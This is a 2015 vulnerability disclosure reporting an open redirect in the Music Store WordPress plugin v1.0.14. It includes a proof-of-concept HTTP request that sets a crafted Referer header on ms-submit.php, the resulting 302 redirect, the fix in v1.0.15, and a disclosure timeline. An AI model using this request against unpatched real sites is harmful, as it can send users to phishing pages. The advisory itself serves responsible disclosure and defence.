# Title: Open Redirect Vulnerability in Music Store Wordpress Plugin v1.0.14 # Submitter: Nitin Venkatesh # Product: Music Store Wordpress Plugin # Product URL: https://wordpress.org/plugins/music-store/ # Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect') [CWE-601] # Affected Versions: v1.0.14 and possibly below. # Tested versions: v1.0.14 # Fixed Version: v1.0.15 # Link to code diff: https://plugins.trac.wordpress.org/changeset/1178058/ # Changelog: https://wordpress.org/plugins/music-store/changelog/ # CVE Status: None & Fresh ## Product Information: Music Store is an online store for selling audio files: music, speeches, narratives, everything audio. In Music Store, secure payments with PayPal. ## Vulnerability Description: Adding HTTP referer to ms-core/ms-submit.php causes an Open redirect vulnerability ## Proof of Concept: Sample HTTP Request: GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://google.com/ Connection: keep-alive Sample HTTP Response: HTTP/1.1 302 Found Date: Fri, 05 Jun 2015 15:29:19 GMT location: https://google.com/ Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html ## Solution: Upgrade to v1.0.15 ## Disclosure Timeline: 2015-06-05 - Discovered. Contacted developer. 2015-06-10 - Updated v1.0.15 released 2015-07-25 - Publishing disclosure on FD mailing list ## Disclaimer: This disclosure is purely meant for educational purposes. I will in no way be responsible as to how the information in this disclosure is used.